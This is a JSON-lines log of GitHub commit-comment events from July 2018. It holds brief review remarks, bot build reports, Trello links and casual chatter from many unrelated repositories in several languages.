{"id":"7932621512","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29630224,"position":null,"line":null,"path":null,"commit_id":"51877656640bb9a6e1e411dba7c7d71c67aa2ea8","created_at":"2018-07-07T16:52:22Z","updated_at":"2018-07-07T16:52:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Системы: располагать системы в по определенному галактическому рисунку.](https://trello.com/c/QBhDgsTo/43-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D1%8B-%D1%80%D0%B0%D1%81%D0%BF%D0%BE%D0%BB%D0%B0%D0%B3%D0%B0%D1%82%D1%8C-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D1%8B-%D0%B2-%D0%BF%D0%BE-%D0%BE%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%BC%D1%83-%D0%B3%D0%B0%D0%BB%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%BC%D1%83-%D1%80%D0%B8%D1%81%D1%83%D0%BD%D0%BA%D1%83)"}},"created_at":"2018-07-07T16:52:22Z"}
{"id":"7932622523","type":"CommitCommentEvent","actor":{"login":"ladyada"},"repo":{"name":"adafruit/Fritzing-Library"},"payload":{"comment":{"id":29630230,"position":null,"line":null,"path":null,"commit_id":"ddb1c4d3262e19935c12edddf57e8b082fe111fe","created_at":"2018-07-07T16:53:12Z","updated_at":"2018-07-07T16:53:12Z","author_association":"MEMBER","body":"@kattni ^"}},"created_at":"2018-07-07T16:53:12Z"}
{"id":"7932622619","type":"CommitCommentEvent","actor":{"login":"JLaskey13"},"repo":{"name":"HannahSantana/SeaOtters"},"payload":{"comment":{"id":29630231,"position":null,"line":null,"path":null,"commit_id":"0453c8cdb847881e3d3be3cffb9cba9ff7ebe739","created_at":"2018-07-07T16:53:17Z","updated_at":"2018-07-07T16:53:17Z","author_association":"COLLABORATOR","body":"Here is the dataset and the code for analysis of earthquake data. I am going to research how the earthquake data is acquired as it looks like the average was much higher until like 71 and then it get much lower and increases throughout the rest of the time periods\r\n"}},"created_at":"2018-07-07T16:53:17Z"}
{"id":"7932622972","type":"CommitCommentEvent","actor":{"login":"Rjtsahu"},"repo":{"name":"Rjtsahu/sample-python-sqlalchemy"},"payload":{"comment":{"id":29630232,"position":1,"line":1,"path":"run.py","commit_id":"7519a2121d2a37010c7c5940b98b314db8d1e0d7","created_at":"2018-07-07T16:53:35Z","updated_at":"2018-07-07T16:53:35Z","author_association":"OWNER","body":"but why??"}},"created_at":"2018-07-07T16:53:35Z"}
{"id":"7932640127","type":"CommitCommentEvent","actor":{"login":"brandido"},"repo":{"name":"brandido/linked-lists"},"payload":{"comment":{"id":29630260,"position":null,"line":null,"path":null,"commit_id":"2e1e3eba8b29e4bdccd849df0ff93e34d2f4492c","created_at":"2018-07-07T17:06:08Z","updated_at":"2018-07-07T17:06:08Z","author_association":"OWNER","body":"Great"}},"created_at":"2018-07-07T17:06:08Z"}
{"id":"7932643079","type":"CommitCommentEvent","actor":{"login":"kattni"},"repo":{"name":"adafruit/Fritzing-Library"},"payload":{"comment":{"id":29630265,"position":null,"line":null,"path":null,"commit_id":"ddb1c4d3262e19935c12edddf57e8b082fe111fe","created_at":"2018-07-07T17:08:18Z","updated_at":"2018-07-07T17:08:18Z","author_association":"MEMBER","body":"Thanks!"}},"created_at":"2018-07-07T17:08:18Z"}
{"id":"7932644022","type":"CommitCommentEvent","actor":{"login":"Xottab-DUTY"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29630267,"position":null,"line":null,"path":null,"commit_id":"672c83150dbd67d22439cb3b5548924573ec94ad","created_at":"2018-07-07T17:09:06Z","updated_at":"2018-07-07T17:09:06Z","author_association":"NONE","body":"Убирание этого даёт улучшение качества текстур, лодов, мипов?"}},"created_at":"2018-07-07T17:09:06Z"}
{"id":"7932645598","type":"CommitCommentEvent","actor":{"login":"rpv-tomsk"},"repo":{"name":"octo/librouteros"},"payload":{"comment":{"id":29630268,"position":null,"line":null,"path":null,"commit_id":"ed0ac07860ad050fb3c6e8397a3fa7f3ddc9084d","created_at":"2018-07-07T17:10:17Z","updated_at":"2018-07-07T17:10:17Z","author_association":"NONE","body":"Values should be 64bit, so `sstrtoui` needs to be replaced by `sstrtoui64`."}},"created_at":"2018-07-07T17:10:17Z"}
{"id":"7932648504","type":"CommitCommentEvent","actor":{"login":"ecomxasia"},"repo":{"name":"ecomxasia/study"},"payload":{"comment":{"id":29630270,"position":null,"line":null,"path":null,"commit_id":"112f6941f72058f08f4df0abcbd9d9dd7d1c4ad9","created_at":"2018-07-07T17:12:32Z","updated_at":"2018-07-07T17:12:32Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-07T17:12:32Z"}
{"id":"7932648734","type":"CommitCommentEvent","actor":{"login":"LancerGreg"},"repo":{"name":"LancerGreg/Home-Work-for-Job"},"payload":{"comment":{"id":29630271,"position":null,"line":null,"path":null,"commit_id":"894d95d07cdd3746961852d9064178593e367aa4","created_at":"2018-07-07T17:12:43Z","updated_at":"2018-07-07T17:12:43Z","author_association":"OWNER","body":"Work was done"}},"created_at":"2018-07-07T17:12:43Z"}
{"id":"7932648902","type":"CommitCommentEvent","actor":{"login":"Portals"},"repo":{"name":"cthit/Gamma"},"payload":{"comment":{"id":29630272,"position":18,"line":46,"path":"backend/src/main/java/it/chalmers/gamma/controller/ITUserController.java","commit_id":"b93c6af419d9ad8220d2bdd791f46c9d8d832f23","created_at":"2018-07-07T17:12:51Z","updated_at":"2018-07-07T17:12:51Z","author_association":"MEMBER","body":"Same here, you should not known if the user already exists"}},"created_at":"2018-07-07T17:12:51Z"}
{"id":"7932649652","type":"CommitCommentEvent","actor":{"login":"ecomxasia"},"repo":{"name":"ecomxasia/study"},"payload":{"comment":{"id":29630274,"position":null,"line":null,"path":null,"commit_id":"3a488ec8e05e3b39d8e8c59a7dec87b69ca071b2","created_at":"2018-07-07T17:13:25Z","updated_at":"2018-07-07T17:13:25Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-07T17:13:25Z"}
{"id":"7932649855","type":"CommitCommentEvent","actor":{"login":"slobns"},"repo":{"name":"slobns/login-register-system"},"payload":{"comment":{"id":29630277,"position":4,"line":18,"path":"index.php","commit_id":"df9454ce0084d59f1346163fc2def0d14d580cf0","created_at":"2018-07-07T17:13:33Z","updated_at":"2018-07-07T17:13:33Z","author_association":"OWNER","body":"Only testing"}},"created_at":"2018-07-07T17:13:33Z"}
{"id":"7932649966","type":"CommitCommentEvent","actor":{"login":"egartley"},"repo":{"name":"egartley/beyond-origins"},"payload":{"comment":{"id":29630278,"position":null,"line":null,"path":null,"commit_id":"5d92779b7274841f08020a90c40eb9e074fc885b","created_at":"2018-07-07T17:13:38Z","updated_at":"2018-07-07T17:13:38Z","author_association":"OWNER","body":"The dirty work should hopefully be done"}},"created_at":"2018-07-07T17:13:38Z"}
{"id":"7932650297","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29630279,"position":null,"line":null,"path":null,"commit_id":"d764ca6ab9358627c2fdcbefd40851dc74b850ba","created_at":"2018-07-07T17:13:53Z","updated_at":"2018-07-07T17:13:53Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-07T17:13:53Z"}
{"id":"7932650496","type":"CommitCommentEvent","actor":{"login":"Portals"},"repo":{"name":"cthit/Gamma"},"payload":{"comment":{"id":29630281,"position":20,"line":56,"path":"backend/src/main/java/it/chalmers/gamma/controller/WhitelistController.java","commit_id":"b93c6af419d9ad8220d2bdd791f46c9d8d832f23","created_at":"2018-07-07T17:14:03Z","updated_at":"2018-07-07T17:14:03Z","author_association":"MEMBER","body":"This should only return if the user already exists if you're an admin"}},"created_at":"2018-07-07T17:14:03Z"}
{"id":"7932650876","type":"CommitCommentEvent","actor":{"login":"Portals"},"repo":{"name":"cthit/Gamma"},"payload":{"comment":{"id":29630282,"position":31,"line":65,"path":"backend/src/main/java/it/chalmers/gamma/controller/WhitelistController.java","commit_id":"b93c6af419d9ad8220d2bdd791f46c9d8d832f23","created_at":"2018-07-07T17:14:20Z","updated_at":"2018-07-07T17:14:20Z","author_association":"MEMBER","body":"Same here"}},"created_at":"2018-07-07T17:14:20Z"}
{"id":"7932651717","type":"CommitCommentEvent","actor":{"login":"Portals"},"repo":{"name":"cthit/Gamma"},"payload":{"comment":{"id":29630284,"position":43,"line":75,"path":"backend/src/main/java/it/chalmers/gamma/controller/WhitelistController.java","commit_id":"b93c6af419d9ad8220d2bdd791f46c9d8d832f23","created_at":"2018-07-07T17:15:00Z","updated_at":"2018-07-07T17:15:00Z","author_association":"MEMBER","body":"Same here, you need to be an admin. But maybe it's fine for now"}},"created_at":"2018-07-07T17:15:00Z"}
{"id":"7932654137","type":"CommitCommentEvent","actor":{"login":"sngupta07"},"repo":{"name":"sngupta07/100_days_of_ml_code"},"payload":{"comment":{"id":29630290,"position":null,"line":null,"path":null,"commit_id":"290401572925343f837b15ac39858fa0579779a9","created_at":"2018-07-07T17:16:47Z","updated_at":"2018-07-07T17:16:47Z","author_association":"OWNER","body":"Unwanted files"}},"created_at":"2018-07-07T17:16:47Z"}
{"id":"7932654629","type":"CommitCommentEvent","actor":{"login":"dengchao-ryan"},"repo":{"name":"dengchao-ryan/AngularLean"},"payload":{"comment":{"id":29630291,"position":null,"line":null,"path":null,"commit_id":"fe68f6c8b4269d2f686d056d3bc9902f768b5a22","created_at":"2018-07-07T17:17:11Z","updated_at":"2018-07-07T17:17:11Z","author_association":"OWNER","body":"这里除了添加了全局css样式，另外还提交了教程练习的组件分离与交互等例子，稍后会将注释加上\r\n"}},"created_at":"2018-07-07T17:17:11Z"}
{"id":"7932655273","type":"CommitCommentEvent","actor":{"login":"SimenB"},"repo":{"name":"facebook/jest"},"payload":{"comment":{"id":29630293,"position":5,"line":397,"path":"packages/jest-runtime/src/__tests__/script_transformer.test.js","commit_id":"23e20263b4cbd48bfc46a45dd3edc69f69a47b23","created_at":"2018-07-07T17:17:40Z","updated_at":"2018-07-07T17:17:40Z","author_association":"COLLABORATOR","body":"good call. Kinda sad we haven't seen it before, though..."}},"created_at":"2018-07-07T17:17:40Z"}
{"id":"7932657284","type":"CommitCommentEvent","actor":{"login":"ecomxasia"},"repo":{"name":"ecomxasia/study"},"payload":{"comment":{"id":29630298,"position":null,"line":null,"path":null,"commit_id":"29070d579fdb577a24092a64bd685883bb630187","created_at":"2018-07-07T17:19:14Z","updated_at":"2018-07-07T17:19:14Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-07T17:19:14Z"}
{"id":"7932657799","type":"CommitCommentEvent","actor":{"login":"ecomxasia"},"repo":{"name":"ecomxasia/study"},"payload":{"comment":{"id":29630300,"position":null,"line":null,"path":null,"commit_id":"da23192b457d8f1e5a2898f53969d0b2f3cd9e32","created_at":"2018-07-07T17:19:42Z","updated_at":"2018-07-07T17:19:42Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-07T17:19:42Z"}
{"id":"7932659083","type":"CommitCommentEvent","actor":{"login":"Randium"},"repo":{"name":"werewolves-devs/Werewolf_Bot"},"payload":{"comment":{"id":29630302,"position":null,"line":null,"path":null,"commit_id":"324349927fa2eac5f7de74eb4875a3ebee62c2fb","created_at":"2018-07-07T17:20:42Z","updated_at":"2018-07-07T17:20:42Z","author_association":"COLLABORATOR","body":"NO I meant to do this in a different branch SHIT"}},"created_at":"2018-07-07T17:20:42Z"}
{"id":"7932659639","type":"CommitCommentEvent","actor":{"login":"Miirpat-Gaalsien"},"repo":{"name":"Miirpat-Gaalsien/MineInAbyss"},"payload":{"comment":{"id":29630303,"position":null,"line":null,"path":null,"commit_id":"6af5694b7b8a51fe2fde39516af524f5229e4e0f","created_at":"2018-07-07T17:21:09Z","updated_at":"2018-07-07T17:21:09Z","author_association":"OWNER","body":"Improved on general curse balancing, added new functions and changed the key being used for durations, due to the wrong key being used."}},"created_at":"2018-07-07T17:21:09Z"}
{"id":"7932660156","type":"CommitCommentEvent","actor":{"login":"Artuto"},"repo":{"name":"Disconnect24/Mail-Go"},"payload":{"comment":{"id":29630305,"position":null,"line":null,"path":null,"commit_id":"54f35cf2f0a6584c67db83516e7c1fe580f1e37e","created_at":"2018-07-07T17:21:33Z","updated_at":"2018-07-07T17:21:33Z","author_association":"NONE","body":"Is this program abuse"}},"created_at":"2018-07-07T17:21:33Z"}
{"id":"7932660243","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29630306,"position":null,"line":null,"path":null,"commit_id":"672c83150dbd67d22439cb3b5548924573ec94ad","created_at":"2018-07-07T17:21:37Z","updated_at":"2018-07-07T17:21:37Z","author_association":"OWNER","body":"Не думаю, что можно на взгляд найти особую разницу. Я вообще всегда убирал из той секции все текстуры, щас просто дошли руки вырубить это в движке. Да и возвращать, сравнивать - мне лень.\r\n"}},"created_at":"2018-07-07T17:21:37Z"}
{"id":"7932669648","type":"CommitCommentEvent","actor":{"login":"anmoolpk"},"repo":{"name":"RehabMan/Clover"},"payload":{"comment":{"id":29630316,"position":null,"line":null,"path":null,"commit_id":"b5f45cc30c3788b4fdfe56a44a18bb6564c5cae9","created_at":"2018-07-07T17:28:53Z","updated_at":"2018-07-07T17:28:53Z","author_association":"NONE","body":"please update prebuilt clover  v4581 on bitbucket"}},"created_at":"2018-07-07T17:28:53Z"}
{"id":"7932676102","type":"CommitCommentEvent","actor":{"login":"caution3"},"repo":{"name":"Disconnect24/Mail-Go"},"payload":{"comment":{"id":29630323,"position":null,"line":null,"path":null,"commit_id":"54f35cf2f0a6584c67db83516e7c1fe580f1e37e","created_at":"2018-07-07T17:33:36Z","updated_at":"2018-07-07T17:33:36Z","author_association":"NONE","body":"@Artuto Perhaps:tm:"}},"created_at":"2018-07-07T17:33:36Z"}
{"id":"7932676122","type":"CommitCommentEvent","actor":{"login":"andret89"},"repo":{"name":"andret89/NetworkMonitor"},"payload":{"comment":{"id":29630324,"position":null,"line":null,"path":null,"commit_id":"0c5511aa75faf49026dd6407ca33e4c12c6d6fd2","created_at":"2018-07-07T17:33:37Z","updated_at":"2018-07-07T17:33:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [pull request](https://trello.com/c/LgwKPMAq/1-pull-request)"}},"created_at":"2018-07-07T17:33:37Z"}
{"id":"7932676465","type":"CommitCommentEvent","actor":{"login":"venkateshsagar1992"},"repo":{"name":"venkateshsagar1992/myproject"},"payload":{"comment":{"id":29630326,"position":null,"line":null,"path":null,"commit_id":"b8b89c571ff2c547f8feb01ec819daa11547475e","created_at":"2018-07-07T17:33:52Z","updated_at":"2018-07-07T17:33:52Z","author_association":"OWNER","body":"No Errors !Go ahead"}},"created_at":"2018-07-07T17:33:52Z"}
{"id":"7932678897","type":"CommitCommentEvent","actor":{"login":"andret89"},"repo":{"name":"andret89/CrossApp"},"payload":{"comment":{"id":29630331,"position":null,"line":null,"path":null,"commit_id":"1a1c6e58926704ee25d7ff6b1fb957fe518ed17d","created_at":"2018-07-07T17:35:42Z","updated_at":"2018-07-07T17:35:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementare Bluetooh](https://trello.com/c/knUxMVYW/3-implementare-bluetooh)"}},"created_at":"2018-07-07T17:35:42Z"}
{"id":"7932679090","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/dcm2niix-feedstock"},"payload":{"comment":{"id":29630332,"position":null,"line":null,"path":null,"commit_id":"4be68dbfe42ec71ab7a0912499843093ee18aba4","created_at":"2018-07-07T17:35:52Z","updated_at":"2018-07-07T17:35:52Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ningfei, @neurolabusc were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @ningfei, @kastman, @neurolabusc were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-07T17:35:52Z"}
{"id":"7932680622","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29630334,"position":null,"line":null,"path":null,"commit_id":"51877656640bb9a6e1e411dba7c7d71c67aa2ea8","created_at":"2018-07-07T17:37:03Z","updated_at":"2018-07-07T17:37:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Камера, графика: сделать масштабирование графики при скролле.](https://trello.com/c/ZhAyKZb3/42-%D0%BA%D0%B0%D0%BC%D0%B5%D1%80%D0%B0-%D0%B3%D1%80%D0%B0%D1%84%D0%B8%D0%BA%D0%B0-%D1%81%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-%D0%BC%D0%B0%D1%81%D1%88%D1%82%D0%B0%D0%B1%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5-%D0%B3%D1%80%D0%B0%D1%84%D0%B8%D0%BA%D0%B8-%D0%BF%D1%80%D0%B8-%D1%81%D0%BA%D1%80%D0%BE%D0%BB%D0%BB%D0%B5)"}},"created_at":"2018-07-07T17:37:03Z"}
{"id":"7932681789","type":"CommitCommentEvent","actor":{"login":"flaviandradde"},"repo":{"name":"raciocinio-computacional/PsicHelp"},"payload":{"comment":{"id":29630335,"position":null,"line":null,"path":null,"commit_id":"1d3957203ad116175dd85f0048f34b5415ec989c","created_at":"2018-07-07T17:37:53Z","updated_at":"2018-07-07T17:37:53Z","author_association":"NONE","body":"  < Div * ngIf = \" estabelecimento.tel \"  ion-item de  texto-wrap >\r\n       < nome do íon-ícone  = \" chamada-md \" item-start > </ ion-icon > \r\n- {{base.tel}}\r\n+       < A href = \" tel: {{estabelecimento.tel}} \" > {{estabelecimento.tel}} </ a > \r\n     </ div >"}},"created_at":"2018-07-07T17:37:53Z"}
{"id":"7932684739","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"Oreo-Harpia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29630340,"position":null,"line":null,"path":null,"commit_id":"22e9d143ed7bfa7ef428dd620e17ce469741dc86","created_at":"2018-07-07T17:40:18Z","updated_at":"2018-07-07T17:40:18Z","author_association":"NONE","body":"This will give you build errors as it doesn't recognize the vendor_* type"}},"created_at":"2018-07-07T17:40:18Z"}
{"id":"7932685107","type":"CommitCommentEvent","actor":{"login":"toundaherve"},"repo":{"name":"toundaherve/hello-world"},"payload":{"comment":{"id":29630341,"position":null,"line":null,"path":null,"commit_id":"9d9dea30e1bc0bdeec7d3d7645226880413338ab","created_at":"2018-07-07T17:40:33Z","updated_at":"2018-07-07T17:40:33Z","author_association":"OWNER","body":"C'est bien ca"}},"created_at":"2018-07-07T17:40:33Z"}
{"id":"7932685549","type":"CommitCommentEvent","actor":{"login":"rabits"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29630342,"position":7,"line":305,"path":"lib/distributions.sh","commit_id":"92258e0298c629059c13f4abc8f762a00a40afd2","created_at":"2018-07-07T17:40:56Z","updated_at":"2018-07-07T17:40:56Z","author_association":"CONTRIBUTOR","body":"One thing - in my defaults for journald.conf it has `Sec` suffix and 30s by default:\r\n```\r\n#RateLimitIntervalSec=30s\r\n```"}},"created_at":"2018-07-07T17:40:56Z"}
{"id":"7932685897","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"Oreo-Harpia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29630343,"position":null,"line":null,"path":null,"commit_id":"44976f8fe2d9877fdf0bde43d237a166a4c195a2","created_at":"2018-07-07T17:41:12Z","updated_at":"2018-07-07T17:41:12Z","author_association":"NONE","body":"You are two commits behind "}},"created_at":"2018-07-07T17:41:12Z"}
{"id":"7932686095","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29630344,"position":null,"line":null,"path":null,"commit_id":"bb89b3892c0521a69e6a1b8c832c97ec1a4137e9","created_at":"2018-07-07T17:41:22Z","updated_at":"2018-07-07T17:41:22Z","author_association":"NONE","body":"ok in this case i approved"}},"created_at":"2018-07-07T17:41:22Z"}
{"id":"7932687132","type":"CommitCommentEvent","actor":{"login":"si404"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":29630346,"position":null,"line":null,"path":null,"commit_id":"c65b38faee51c128711196cce08e9d5bbdd2f6d9","created_at":"2018-07-07T17:42:08Z","updated_at":"2018-07-07T17:42:08Z","author_association":"CONTRIBUTOR","body":"Because they are fantasy ones and so have no business being in the dataset, even as unused files."}},"created_at":"2018-07-07T17:42:08Z"}
{"id":"7932688632","type":"CommitCommentEvent","actor":{"login":"SubhrajyotiSen"},"repo":{"name":"Oreo-Harpia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29630347,"position":null,"line":null,"path":null,"commit_id":"22e9d143ed7bfa7ef428dd620e17ce469741dc86","created_at":"2018-07-07T17:43:22Z","updated_at":"2018-07-07T17:43:22Z","author_association":"CONTRIBUTOR","body":"I know :stuck_out_tongue: "}},"created_at":"2018-07-07T17:43:22Z"}
{"id":"7932690477","type":"CommitCommentEvent","actor":{"login":"LauraStru"},"repo":{"name":"AnnaVorl/Satellitenbahn"},"payload":{"comment":{"id":29630349,"position":null,"line":null,"path":null,"commit_id":"c2eebe973e0c74fdf654f0b76df297466a8cf690","created_at":"2018-07-07T17:44:53Z","updated_at":"2018-07-07T17:44:53Z","author_association":"COLLABORATOR","body":"In den Uploads findet Ihr den aktuellen Zwischenstand unseres Eclipse-Projektes ... und ja, wir sind noch nicht ganz am Ziel ... ;)"}},"created_at":"2018-07-07T17:44:53Z"}
{"id":"7932690907","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630351,"position":7,"line":7,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T17:45:13Z","updated_at":"2018-07-07T17:45:13Z","author_association":"NONE","body":"resource**s**\r\nmy **own** words."}},"created_at":"2018-07-07T17:45:13Z"}
{"id":"7932691243","type":"CommitCommentEvent","actor":{"login":"SubhrajyotiSen"},"repo":{"name":"Oreo-Harpia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":29630354,"position":null,"line":null,"path":null,"commit_id":"44976f8fe2d9877fdf0bde43d237a166a4c195a2","created_at":"2018-07-07T17:45:27Z","updated_at":"2018-07-07T17:45:27Z","author_association":"CONTRIBUTOR","body":"Check carefully"}},"created_at":"2018-07-07T17:45:27Z"}
{"id":"7932691666","type":"CommitCommentEvent","actor":{"login":"tltctw"},"repo":{"name":"tltctw/tltctw.github.io"},"payload":{"comment":{"id":29630355,"position":null,"line":null,"path":null,"commit_id":"1a83f648c53e43339473fc3524d75ee1265e9d2b","created_at":"2018-07-07T17:45:47Z","updated_at":"2018-07-07T17:45:47Z","author_association":"OWNER","body":"<html>\r\n<head>\r\n<title>设置有效期限</title>\r\n<meta http-equive=\"expires\" content=\"Web, 3 july 2018 11:25:00 GMT\">\r\n</head>\r\n<body>\r\n大家好，我是码上有钱\r\n</body>\r\n</html>"}},"created_at":"2018-07-07T17:45:47Z"}
{"id":"7932692311","type":"CommitCommentEvent","actor":{"login":"sormuras"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29630356,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-07T17:46:17Z","updated_at":"2018-07-07T17:46:17Z","author_association":"COLLABORATOR","body":"Why only packages?"}},"created_at":"2018-07-07T17:46:17Z"}
{"id":"7932692380","type":"CommitCommentEvent","actor":{"login":"CJ-Wright"},"repo":{"name":"conda-forge/pykrige-feedstock"},"payload":{"comment":{"id":29630357,"position":17,"line":26,"path":"recipe/meta.yaml","commit_id":"2814080e035372cc805fab70eebcaebb76ef3273","created_at":"2018-07-07T17:46:20Z","updated_at":"2018-07-07T17:46:20Z","author_association":"MEMBER","body":"I think you need to add back the 1.11.* pinning"}},"created_at":"2018-07-07T17:46:20Z"}
{"id":"7932693100","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630358,"position":15,"line":15,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T17:46:51Z","updated_at":"2018-07-07T17:46:51Z","author_association":"NONE","body":"...can start running code **from** different..."}},"created_at":"2018-07-07T17:46:51Z"}
{"id":"7932693513","type":"CommitCommentEvent","actor":{"login":"ethanwilkins"},"repo":{"name":"floppernopper/Cypher"},"payload":{"comment":{"id":29630359,"position":null,"line":null,"path":null,"commit_id":"0d48fd0350d32fc8e0386c73349ce8b6241adbf6","created_at":"2018-07-07T17:47:10Z","updated_at":"2018-07-07T17:47:10Z","author_association":"NONE","body":"https://superuser.com/questions/336004/how-to-run-python-script-in-ahk"}},"created_at":"2018-07-07T17:47:10Z"}
{"id":"7932696561","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630360,"position":17,"line":17,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T17:49:38Z","updated_at":"2018-07-07T17:49:38Z","author_association":"NONE","body":"handle -> support\r\nIt seems that the BOOT1 pin is absent in the F0 sub-family, eliminating the option to start from RAM."}},"created_at":"2018-07-07T17:49:38Z"}
{"id":"7932696597","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29630361,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-07T17:49:39Z","updated_at":"2018-07-07T17:49:39Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-07T17:49:39Z"}
{"id":"7932697021","type":"CommitCommentEvent","actor":{"login":"ThomasGravekamp"},"repo":{"name":"MrOneTwo/mronetwo.github.io"},"payload":{"comment":{"id":29630362,"position":18,"line":18,"path":"_posts/2018-06-19-stm32_03.md","commit_id":"fc5445aa6b826a7c6e10b2b8189b6c7ce0f4b087","created_at":"2018-07-07T17:50:00Z","updated_at":"2018-07-07T17:50:00Z","author_association":"NONE","body":"normal **operation**"}},"created_at":"2018-07-07T17:50:00Z"}
{"id":"7932697747","type":"CommitCommentEvent","actor":{"login":"aion82"},"repo":{"name":"ethereum/ethereum-org"},"payload":{"comment":{"id":29630363,"position":15,"line":13,"path":".travis.yml","commit_id":"f3e814be7ae43d6a6aca66bba7937eae20a256c6","created_at":"2018-07-07T17:50:34Z","updated_at":"2018-07-07T17:50:34Z","author_association":"NONE","body":" 404 error issue "}},"created_at":"2018-07-07T17:50:34Z"}
{"id":"7932698268","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29630365,"position":null,"line":null,"path":null,"commit_id":"bb89b3892c0521a69e6a1b8c832c97ec1a4137e9","created_at":"2018-07-07T17:50:58Z","updated_at":"2018-07-07T17:50:58Z","author_association":"NONE","body":"It has been tested for 2 million games at LTC, so why the heck do we need to test it at STC?  I think it should go strait to LTC and if it passes there then VLTC."}},"created_at":"2018-07-07T17:50:58Z"}
{"id":"7932698936","type":"CommitCommentEvent","actor":{"login":"aion82"},"repo":{"name":"ethereum/ethereum-org"},"payload":{"comment":{"id":29630366,"position":null,"line":null,"path":null,"commit_id":"f3e814be7ae43d6a6aca66bba7937eae20a256c6","created_at":"2018-07-07T17:51:31Z","updated_at":"2018-07-07T17:51:31Z","author_association":"NONE","body":"Crypto world Jason "}},"created_at":"2018-07-07T17:51:31Z"}
